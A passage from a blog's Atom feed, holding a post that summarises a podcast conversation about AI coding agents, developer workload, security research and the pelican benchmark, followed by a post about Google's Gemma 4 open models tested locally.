&lt;h2 id="writing-code-on-my-phone"&gt;Writing code on my phone&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=499"&gt;8:19&lt;/a&gt; - I write so much of my code on my phone. It's wild. I can get good work done walking the dog along the beach, which is delightful.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I mainly use the Claude iPhone app for this, both with a regular Claude chat session (which &lt;a href="https://simonwillison.net/2025/Sep/9/claude-code-interpreter/"&gt;can execute code now&lt;/a&gt;) or using it to control &lt;a href="https://code.claude.com/docs/en/claude-code-on-the-web"&gt;Claude Code for web&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="responsible-vibe-coding"&gt;Responsible vibe coding&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=595"&gt;9:55&lt;/a&gt; If you're vibe coding something for yourself, where the only person who gets hurt if it has bugs is you, go wild. That's completely fine. The moment you ship your vibe coding code for other people to use, where your bugs might actually harm somebody else, that's when you need to take a step back.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;See also &lt;a href="https://simonwillison.net/2025/Mar/19/vibe-coding/#when-is-it-ok-to-vibe-code-"&gt;When is it OK to vibe code?&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="dark-factories-and-strongdm"&gt;Dark Factories and StrongDM&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=769"&gt;12:49&lt;/a&gt; The reason it's called the dark factory is there's this idea in factory automation that if your factory is so automated that you don't need any people there, you can turn the lights off. Like the machines can operate in complete darkness if you don't need people on the factory floor. What does that look like for software? [...]&lt;/p&gt;
&lt;p&gt;So there's this policy that nobody writes any code: you cannot type code into a computer. And honestly, six months ago, I thought that was crazy. And today, probably 95% of the code that I produce, I didn't type myself. That world is practical already because the latest models are good enough that you can tell them to rename that variable and refactor and add this line there... and they'll just do it - it's faster than you typing on the keyboard yourself.&lt;/p&gt;
&lt;p&gt;The next rule though, is nobody &lt;em&gt;reads&lt;/em&gt; the code. And this is the thing which StrongDM started doing last year.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I wrote a lot more about &lt;a href="https://simonwillison.net/2026/Feb/7/software-factory/"&gt;StrongDM's dark factory explorations&lt;/a&gt; back in February.&lt;/p&gt;
&lt;h2 id="the-bottleneck-has-moved-to-testing"&gt;The bottleneck has moved to testing&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1287"&gt;21:27&lt;/a&gt; - It used to be, you'd come up with a spec and you hand it to your engineering team. And three weeks later, if you're lucky, they'd come back with an implementation. And now that maybe takes three hours, depending on how well the coding agents are established for that kind of thing. So now what, right? Now, where else are the bottlenecks?&lt;/p&gt;
&lt;p&gt;Anyone who's done any product work knows that your initial ideas are always wrong. What matters is proving them, and testing them.&lt;/p&gt;
&lt;p&gt;We can test things so much faster now because we can build workable prototypes so much quicker. So there's an interesting thing I've been doing in my own work where any feature that I want to design, I'll often prototype three different ways it could work because that takes very little time.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've always loved prototyping things, and prototyping is even more valuable now.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1360"&gt;22:40&lt;/a&gt; - A UI prototype is free now. ChatGPT and Claude will just build you a very convincing UI for anything that you describe. And that's how you should be working. I think anyone who's doing product design and isn't vibe coding little prototypes is missing out on the most powerful boost that we get in that step.&lt;/p&gt;
&lt;p&gt;But then what do you do? Given your three options that you have instead of one option, how do you prove to yourself which one of those is the best? I don't have a confident answer to that. I expect this is where the good old fashioned usability testing comes in.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;More on prototyping later on:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=2795"&gt;46:35&lt;/a&gt; - Throughout my entire career, my superpower has been prototyping. I've been very quick at knocking out working prototypes of things. I'm the person who can show up at a meeting and say, look, here's how it could work. And that was kind of my unique selling point. And that's gone. Anyone can do what I could do.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="this-stuff-is-exhausting"&gt;This stuff is exhausting&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1585"&gt;26:25&lt;/a&gt; - I'm finding that using coding agents well is taking every inch of my 25 years of experience as a software engineer, and it is mentally exhausting. I can fire up four agents in parallel and have them work on four different problems. And by like 11 AM, I am wiped out for the day. [...]&lt;/p&gt;
&lt;p&gt;There's a personal skill we have to learn in finding our new limits - what's a responsible way for us not to burn out.&lt;/p&gt;
&lt;p&gt;I've talked to a lot of people who are losing sleep because they're like, my coding agents could be doing work for me. I'm just going to stay up an extra half hour and set off a bunch of extra things... and then waking up at four in the morning. That's obviously unsustainable. [...]&lt;/p&gt;
&lt;p&gt;There's an element of sort of gambling and addiction to how we're using some of these tools.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="interruptions-cost-a-lot-less-now"&gt;Interruptions cost a lot less now&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=2716"&gt;45:16&lt;/a&gt; - People talk about how important it is not to interrupt your coders. Your coders need to have solid two to four hour blocks of uninterrupted work so they can spin up their mental model and churn out the code. That's changed completely. My programming work, I need two minutes every now and then to prompt my agent about what to do next. And then I can do the other stuff and I can go back. I'm much more interruptible than I used to be.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="my-ability-to-estimate-software-is-broken"&gt;My ability to estimate software is broken&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1699"&gt;28:19&lt;/a&gt; - I've got 25 years of experience in how long it takes to build something. And that's all completely gone - it doesn't work anymore because I can look at a problem and say that this is going to take two weeks, so it's not worth it. And now it's like... maybe it's going to take 20 minutes because the reason it would have taken two weeks was all of the sort of crufty coding things that the AI is now covering for us.&lt;/p&gt;
&lt;p&gt;I constantly throw tasks at AI that I don't think it'll be able to do because every now and then it does it. And when it doesn't do it, you learn, right? But when it &lt;em&gt;does&lt;/em&gt; do something, especially something that the previous models couldn't do, that's actually cutting edge AI research.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And a related anecdote:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=2216"&gt;36:56&lt;/a&gt; - A lot of my friends have been talking about how they have this backlog of side projects, right? For the last 10, 15 years, they've got projects they never quite finished. And some of them are like, well, I've done them all now. Last couple of months, I just went through and every evening I'm like, let's take that project and finish it. And they almost feel a sort of sense of loss at the end where they're like, well, okay, my backlog's gone. Now what am I going to build?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="it-s-tough-for-people-in-the-middle"&gt;It's tough for people in the middle&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1769"&gt;29:29&lt;/a&gt; - So ThoughtWorks, the big IT consultancy, &lt;a href="https://www.thoughtworks.com/insights/articles/reflections-future-software-engineering-retreat"&gt;did an offsite about a month ago&lt;/a&gt;, and they got a whole bunch of engineering VPs in from different companies to talk about this stuff. And one of the interesting theories they came up with is they think this stuff is really good for experienced engineers, like it amplifies their skills. It's really good for new engineers because it solves so many of those onboarding problems. The problem is the people in the middle. If you're mid-career, if you haven't made it to sort of super senior engineer yet, but you're not sort of new either, that's the group which is probably in the most trouble right now.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I mentioned &lt;a href="https://blog.cloudflare.com/cloudflare-1111-intern-program/"&gt;Cloudflare hiring 1,000 interns&lt;/a&gt;, and Shopify too.&lt;/p&gt;
&lt;p&gt;Lenny asked for my advice for people stuck in that middle:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1881"&gt;31:21&lt;/a&gt; - That's a big responsibility you're putting on me there! I think the way forward is to lean into this stuff and figure out how do I help this make me better?&lt;/p&gt;
&lt;p&gt;A lot of people worry about skill atrophy: if the AI is doing it for you, you're not learning anything. I think if you're worried about that, you push back at it. You have to be mindful about how you're applying the technology and think, okay, I've been given this thing that can answer any question and &lt;em&gt;often&lt;/em&gt; gets it right. How can I use this to amplify my own skills, to learn new things, to take on much more ambitious projects? [...]&lt;/p&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1985"&gt;33:05&lt;/a&gt; - Everything is changing so fast right now. The only universal skill is being able to roll with the changes. That's the thing that we all need.&lt;/p&gt;
&lt;p&gt;The term that comes up most in these conversations about how you can be great with AI is &lt;em&gt;agency&lt;/em&gt;. I think agents have no agency at all. I would argue that the one thing AI can never have is agency because it doesn't have human motivations.&lt;/p&gt;
&lt;p&gt;So I'd say that's the thing is to invest in your own agency and invest in how to use this technology to get better at what you do and to do new things.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="it-s-harder-to-evaluate-software"&gt;It's harder to evaluate software&lt;/h2&gt;
&lt;p&gt;The fact that it's so easy to create software with detailed documentation and robust tests means it's harder to figure out what's a credible project.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=2267"&gt;37:47&lt;/a&gt; Sometimes I'll have an idea for a piece of software, Python library or whatever, and I can knock it out in like an hour and get to a point where it's got documentation and tests and all of those things, and it looks like the kind of software that previously I'd have spent several weeks on - and I can stick it up on GitHub&lt;/p&gt;
&lt;p&gt;And yet... I don't believe in it. And the reason I don't believe in it is that I got to rush through all of those things... I think the quality is probably good, but I haven't spent enough time with it to feel confident in that quality. Most importantly, I &lt;em&gt;haven't used it yet&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;It turns out when I'm using somebody else's software, the thing I care most about is I want them to have used it for months.&lt;/p&gt;
&lt;p&gt;I've got some very cool software that I built that I've &lt;em&gt;never used&lt;/em&gt;. It was quicker to build it than to actually try and use it!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="the-misconception-that-ai-tools-are-easy"&gt;The misconception that AI tools are easy&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=2491"&gt;41:31&lt;/a&gt; - Everyone's like, oh, it must be easy. It's just a chat bot. It's not easy. That's one of the great misconceptions in AI is that using these tools effectively is easy. It takes a lot of practice and it takes a lot of trying things that didn't work and trying things that did work.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="coding-agents-are-useful-for-security-research-now"&gt;Coding agents are useful for security research now&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1144"&gt;19:04&lt;/a&gt; - In the past sort of three to six months, they've started being credible as security researchers, which is sending shockwaves through the security research industry.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;See Thomas Ptacek: &lt;a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/"&gt;Vulnerability Research Is Cooked&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;At the same time, open source projects are being bombarded with junk security reports:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1205"&gt;20:05&lt;/a&gt; - There are these people who don't know what they're doing, who are asking ChatGPT to find a security hole and then reporting it to the maintainer. And the report looks good. ChatGPT can produce a very well formatted report of a vulnerability. It's a total waste of time. It's not actually verified as being a real problem.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A good example of the right way to do this is &lt;a href="https://blog.mozilla.org/en/firefox/hardening-firefox-anthropic-red-team/"&gt;Anthropic's collaboration with Firefox&lt;/a&gt;, where Anthropic's security team &lt;em&gt;verified&lt;/em&gt; every security problem before passing them to Mozilla.&lt;/p&gt;
&lt;h2 id="openclaw"&gt;OpenClaw&lt;/h2&gt;
&lt;p&gt;Of course we had to talk about OpenClaw! Lenny had his running on a Mac Mini.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=5363"&gt;1:29:23&lt;/a&gt; - OpenClaw demonstrates that people want a personal digital assistant so much that they are willing to not just overlook the security side of things, but also getting the thing running is not easy. You've got to create API keys and tokens and install stuff. It's not trivial to get set up and hundreds of thousands of people got it set up. [...]&lt;/p&gt;
&lt;p&gt;The first line of code for OpenClaw was written on November the 25th. And then in the Super Bowl, there was an ad for AI.com, which was effectively a vaporware white labeled OpenClaw hosting provider. So we went from first line of code in November to Super Bowl ad in what? Three and a half months.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I continue to love Drew Breunig's description of OpenClaw as a digital pet:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A friend of mine said that OpenClaw is basically a Tamagotchi. It's a digital pet and you buy the Mac Mini as an aquarium.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="journalists-are-good-at-dealing-with-unreliable-sources"&gt;Journalists are good at dealing with unreliable sources&lt;/h2&gt;
&lt;p&gt;In talking about my explorations of AI for data journalism through &lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=5698"&gt;1:34:58&lt;/a&gt; - You would have thought that AI is a very bad fit for journalism where the whole idea is to find the truth. But the flip side is journalists deal with untrustworthy sources all the time. The art of journalism is you talk to a bunch of people and some of them lie to you and you figure out what's true. So as long as the journalist treats the AI as yet another unreliable source, they're actually better equipped to work with AI than most other professions are.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="the-pelican-benchmark"&gt;The pelican benchmark&lt;/h2&gt;
&lt;p&gt;Obviously we talked about &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle/"&gt;pelicans riding bicycles&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=3370"&gt;56:10&lt;/a&gt; - There appears to be a very strong correlation between how good their drawing of a pelican riding a bicycle is and how good they are at everything else. And nobody can explain to me why that is. [...]&lt;/p&gt;
&lt;p&gt;People kept on asking me, what if labs cheat on the benchmark? And my answer has always been, really, &lt;a href="https://simonwillison.net/2025/Nov/13/training-for-pelicans-riding-bicycles/"&gt;all I want from life is a really good picture of a pelican riding a bicycle&lt;/a&gt;. And if I can trick every AI lab in the world into cheating on benchmarks to get it, then that just achieves my goal.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=3596"&gt;59:56&lt;/a&gt; - I think something people often miss is that this space is inherently funny. The fact that we have these incredibly expensive, power hungry, supposedly the most advanced computers of all time. And if you ask them to draw a pelican on a bicycle, it looks like a five-year-old drew it. That's really funny to me.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="and-finally-some-good-news-about-parrots"&gt;And finally, some good news about parrots&lt;/h2&gt;
&lt;p&gt;Lenny asked if I had anything else I wanted to leave listeners with to wrap up the show, so I went with the best piece of news in the world right now.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=5890"&gt;1:38:10&lt;/a&gt; - There is a rare parrot in New Zealand called the Kākāpō. There are only 250 of these parrots left in the world. They are flightless nocturnal parrots - beautiful green dumpy looking things. And the good news is they're having a fantastic breeding season in 2026,&lt;/p&gt;
&lt;p&gt;They only breed when the Rimu trees in New Zealand have a mass fruiting season, and the Rimu trees haven't done that since 2022 - so there has not been a single baby kākāpō born in four years.&lt;/p&gt;
&lt;p&gt;This year, the Rimu trees are in fruit. The kākāpō are breeding. There have been dozens of new chicks born. It's a really, really good time. It's great news for rare New Zealand parrots and you should look them up because they're delightful.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Everyone should &lt;a href="https://www.youtube.com/live/LDSWtyU6-Lg"&gt;watch the live stream of Rakiura on her nest with two chicks&lt;/a&gt;!&lt;/p&gt;
&lt;h2 id="youtube-chapters"&gt;YouTube chapters&lt;/h2&gt;
&lt;p&gt;Here's the full list of chapters Lenny's team defined for the YouTube video:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA"&gt;00:00&lt;/a&gt;: Introduction to Simon Willison&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=160s"&gt;02:40&lt;/a&gt;: The November 2025 inflection point&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=481s"&gt;08:01&lt;/a&gt;: What's possible now with AI coding&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=642s"&gt;10:42&lt;/a&gt;: Vibe coding vs. agentic engineering&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=837s"&gt;13:57&lt;/a&gt;: The dark-factory pattern&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=1241s"&gt;20:41&lt;/a&gt;: Where bottlenecks have shifted&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=1416s"&gt;23:36&lt;/a&gt;: Where human brains will continue to be valuable&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=1532s"&gt;25:32&lt;/a&gt;: Defending of software engineers&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=1752s"&gt;29:12&lt;/a&gt;: Why experienced engineers get better results&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=1848s"&gt;30:48&lt;/a&gt;: Advice for avoiding the permanent underclass&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=2032s"&gt;33:52&lt;/a&gt;: Leaning into AI to amplify your skills&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=2112s"&gt;35:12&lt;/a&gt;: Why Simon says he's working harder than ever&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=2243s"&gt;37:23&lt;/a&gt;: The market for pre-2022 human-written code&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=2401s"&gt;40:01&lt;/a&gt;: Prediction: 50% of engineers writing 95% AI code by the end of 2026&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=2674s"&gt;44:34&lt;/a&gt;: The impact of cheap code&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=2907s"&gt;48:27&lt;/a&gt;: Simon's AI stack&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=3248s"&gt;54:08&lt;/a&gt;: Using AI for research&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=3312s"&gt;55:12&lt;/a&gt;: The pelican-riding-a-bicycle benchmark&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=3541s"&gt;59:01&lt;/a&gt;: The inherent ridiculousness of AI&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=3652s"&gt;1:00:52&lt;/a&gt;: Hoarding things you know how to do&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=4101s"&gt;1:08:21&lt;/a&gt;: Red/green TDD pattern for better AI code&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=4483s"&gt;1:14:43&lt;/a&gt;: Starting projects with good templates&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=4591s"&gt;1:16:31&lt;/a&gt;: The lethal trifecta and prompt injection&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=4913s"&gt;1:21:53&lt;/a&gt;: Why 97% effectiveness is a failing grade&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=5119s"&gt;1:25:19&lt;/a&gt;: The normalization of deviance&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=5312s"&gt;1:28:32&lt;/a&gt;: OpenClaw: the security nightmare everyone is looking past&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=5662s"&gt;1:34:22&lt;/a&gt;: What's next for Simon&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=5807s"&gt;1:36:47&lt;/a&gt;: Zero-deliverable consulting&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=5885s"&gt;1:38:05&lt;/a&gt;: Good news about Kakapo parrots&lt;/li&gt;
&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/podcast-appearances"&gt;podcast-appearances&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/kakapo"&gt;kakapo&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="podcast-appearances"/><category term="ai"/><category term="llms"/><category term="coding-agents"/><category term="generative-ai"/><category term="kakapo"/><category term="agentic-engineering"/></entry><entry><title>Gemma 4: Byte for byte, the most capable open models</title><link href="https://simonwillison.net/2026/Apr/2/gemma-4/#atom-tag" rel="alternate"/><published>2026-04-02T18:28:54+00:00</published><updated>2026-04-02T18:28:54+00:00</updated><id>https://simonwillison.net/2026/Apr/2/gemma-4/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/"&gt;Gemma 4: Byte for byte, the most capable open models&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Four new vision-capable Apache 2.0 licensed reasoning LLMs from Google DeepMind, sized at 2B, 4B, 31B, plus a 26B-A4B Mixture-of-Experts.&lt;/p&gt;
&lt;p&gt;Google emphasize "unprecedented level of intelligence-per-parameter", providing yet more evidence that creating small useful models is one of the hottest areas of research right now.&lt;/p&gt;
&lt;p&gt;They actually label the two smaller models as E2B and E4B for "Effective" parameter size. The system card explains:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The smaller models incorporate Per-Layer Embeddings (PLE) to maximize parameter efficiency in on-device deployments. Rather than adding more layers or parameters to the model, PLE gives each decoder layer its own small embedding for every token. These embedding tables are large but are only used for quick lookups, which is why the effective parameter count is much smaller than the total.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I don't entirely understand that, but apparently that's what the "E" in E2B means!&lt;/p&gt;
&lt;p&gt;One particularly exciting feature of these models is that they are multi-modal beyond just images:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Vision and audio&lt;/strong&gt;: All models natively process video and images, supporting variable resolutions, and excelling at visual tasks like OCR and chart understanding. Additionally, the E2B and E4B models feature native audio input for speech recognition and understanding.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've not figured out a way to run audio input locally - I don't think that feature is in LM Studio or Ollama yet.&lt;/p&gt;
&lt;p&gt;I tried them out using the GGUFs for &lt;a href="https://lmstudio.ai/models/gemma-4"&gt;LM Studio&lt;/a&gt;. The 2B (4.41GB), 4B (6.33GB) and 26B-A4B (17.99GB) models all worked perfectly, but the 31B (19.89GB) model was broken and spat out &lt;code&gt;"---\n"&lt;/code&gt; in a loop for every prompt I tried.&lt;/p&gt;
&lt;p&gt;The succession of &lt;a href="https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb"&gt;pelican quality&lt;/a&gt; from 2B to 4B to 26B-A4B is notable:&lt;/p&gt;
&lt;p&gt;E2B:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Two blue circles on a brown rectangle and a weird mess of orange blob and yellow triangle for the pelican" src="https://static.simonwillison.net/static/2026/gemma-4-2b-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;E4B:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Two black wheels joined by a sort of grey surfboard, the pelican is semicircles and a blue blob floating above it" src="https://static.simonwillison.net/static/2026/gemma-4-4b-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;26B-A4B:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Bicycle has the right pieces although the frame is wonky. Pelican is genuinely good, has a big triangle beak and a nice curved neck and is clearly a bird that is sitting on the bicycle" src="https://static.simonwillison.net/static/2026/gemma-4-26b-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;(This one actually had an SVG error - "error on line 18 at column 88: Attribute x1 redefined" - but after &lt;a href="https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb?permalink_comment_id=6074105#gistcomment-6074105"&gt;fixing that&lt;/a&gt; I got probably the best pelican I've seen yet from a model that runs on my laptop.)&lt;/p&gt;
&lt;p&gt;Google are providing API access to the two larger Gemma models via their &lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemma-4-31b-it"&gt;AI Studio&lt;/a&gt;. I added support to &lt;a href="https://github.com/simonw/llm-gemini"&gt;llm-gemini&lt;/a&gt; and then &lt;a href="https://gist.github.com/simonw/f9f9e9c34c7cc0ef5325a2876413e51e"&gt;ran a pelican&lt;/a&gt; through the 31B model using that:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm -m gemini/gemma-4-31b-it 'Generate an SVG of a pelican riding a bicycle'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Pretty good, though it is missing the front part of the bicycle frame:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Motion blur lines, a mostly great bicycle albeit missing the front part of the frame. Pelican is decent. " src="https://static.simonwillison.net/static/2026/gemma-4-31b-pelican.png" /&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/vision-llms"&gt;vision-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-reasoning"&gt;llm-reasoning&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemma"&gt;gemma&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/lm-studio"&gt;lm-studio&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;&lt;/p&gt;



</summary><category term="vision-llms"/><category term="llm"/><category term="llm-reasoning"/><category term="ai"/><category term="local-llms"/><category term="llms"/><category term="gemma"/><category term="llm-release"/><category term="google"/><category term="generative-ai"/><category term="lm-studio"/><category term="pelican-riding-a-bicycle"/></entry><entry><title>Quoting Soohoon Choi</title><link href="https://simonwillison.net/2026/Apr/1/soohoon-choi/#atom-tag" rel="alternate"/><published>2026-04-01T02:07:16+00:00</published><updated>2026-04-01T02:07:16+00:00</updated><id>https://simonwillison.net/2026/Apr/1/soohoon-choi/#atom-tag</id><summary type="html">
